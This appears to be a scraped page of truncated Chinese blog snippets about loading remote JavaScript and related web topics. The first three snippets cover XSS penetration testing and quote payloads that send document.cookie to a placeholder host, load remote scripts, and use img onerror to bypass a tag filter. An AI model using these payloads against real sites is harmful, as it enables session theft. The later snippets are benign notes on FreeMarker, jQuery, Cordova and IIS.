在早期 , 对于xss我们是这样利用的 <script>window.open('http://xxx.xxx/cookie.asp?msg='+document.cookie)</script> 将 cookie之类的数据传递到自己的服务端但是 如果要更为复杂的攻击的话,由于字符串长度等限制 需要加载远程js来实现. 一个简单的例子 <script src=http://xxx.xxx/a.js></script> 这样更为简洁 <script sr…

这次在对一个系统渗透测试过程中,发现一个XSS漏洞,可弹窗,并且没有httponly 但是在尝试加载远程js文件的时候发现,script标签被过滤掉了,准确的说应该是服务器后端在识别到输入内容有<>的时候,会把每对尖括号以及尖括号里面的内容都过滤掉,唯独有一个特例,就是img标签不会 在网上找了一些资料,发现可以用img来加载远程js,陆陆续续试过以下几个方法: 1.<img src=x onerror=document.body.appendChild(document.createE…

script 没有调用远程平台,用web接收cookie <script>window.open('http://xxx.xxx/cookie.asp?msg='+document.cookie)</script> 简单的script链接远程第三方js,省略协议,浏览器自动加载当前页面的协议 <script src=//xxx.xxx/a.js></script> img图片 图片创建script节点,链接远程第三方JS <img src=x oner…

在一个大网站里,有很多子域名,也就是有很多子系统,这些子系统由不同的团队负责,对整个网站的风格的风格至少得要是一致的(最基本的页头.页尾必须一致),这个时候得提供一份统一的页头.页尾以及公共的JS.css等内容,但如果是直接给源代码(ftl/js/css)的形式,对于后期的升级维护必然增加不必要的麻烦,必须得只有一个维护这个代码. freemarker提供了远程模板加载的功能,在各个业务方里就像使用本地的模板一样使用远程的统一的模板代码. 1.编写自定义的模板加载器(继续freemarker的接…

之前就说这个版本会解决可以加载远程的含有代码的swf文件的需求.但是,一直比较好奇这个是否行得通,还以为 Adobe 副总裁去了苹果,内部给了特殊待遇. 因为苹果一直就是不允许远程加载代码的,像js文件都是很危险的. 但是,昨天这个3.7发布后,弄了下.发现这个并不是想象那样. 目前,3.7实现的方式是 在打包ipa的时候,ADT 会对需要外部加载的swf文件进行处理,从中抽取了ABC码打包到ipa中,然后得到一个没有abc码的swf,那么你就把这个swf部署到服务器上. 步骤: 1.建立外部s…

在很多js框架中看到过,如果要动态加载框架内部的其他js,加载的时候加载的地址经常是一个相对的地址,只能是这样了哦,因为框架根本不知道用此框架的用户,将框架js文件放的具体目录,所以框架中一般会采用如下方法 (1)默认采用页面中加载core.js(框架的核心js)指定的地址为基准地址(basePath) (2)用户直接采用框架提供的配置方法指定basePath 那么框架是怎么做到默认的呢?请看下面你就明白了. 1 Html代码 <!DOCTYPE html> <html> <…

jQuery.ajax( options ) : 通过 HTTP 请求加载远程数据 这个是jQuery 的底层 AJAX 实现.简单易用的高层实现见 $.get, $.post 等. $.ajax() 返回其创建的 XMLHttpRequest 对象.大多数情况下你无需直接操作该对象,但特殊情况下可用于手动终止请求. 注意: 如果你指定了 dataType 选项,请确保服务器返回正确的 MIME 信息,(如 xml 返回 "text/xml").错误的 MIME 类型可能导致不可预知的…

老大说,我们的项目要hybrid,要实现1.html能调用native:2.本地html调用本地html界面:3.能加载远程界面..... 因为我的项目是已有的(以下简称 项目),所以是要在已有的项目里加上cordova,只是在加载远程界面这个搞了好久,伤~~~ 配置cordova 人太懒,看这里的博客吧.或者自行搜索,网上一大把. 加载远程界面 看了好几篇博客,都不行. a.ios cordova如何加载远程界面? b.Cordoval在iOS中的运用整理 ...... 不行 然后我试着用$…

网站加载css/js/img等静态文件失败,报网站http服务器内部500错误.而服务器中静态文件存在且权限正常. 从浏览器中直接访问文件,出来乱码.这种问题原因在于iis中该网站mime配置报错,不识别文件类型.可去iis中处理mime配置问题,一般是配置重复性问题. 例如,对单个网站配置mime,增加了apk文件类型,则会在该网站的config文件中增加一句apk mime相关的代码(具体代码记不清了),以后若iis再整体配置mime apk时,则此网站会报mime重复配置错误,网站中的cs…

根据打开页面加载不同Js //根据打开页面加载不同JS $(document).ready(function(){ var href = document.URL; /*获取当前页面的URL*/ if (href.indexOf('101.html')>0) /*判断是否包含词 seriw.html 修改成你想要的*/ { $("head").append('<script type="text/jscript" src="js/jquery1…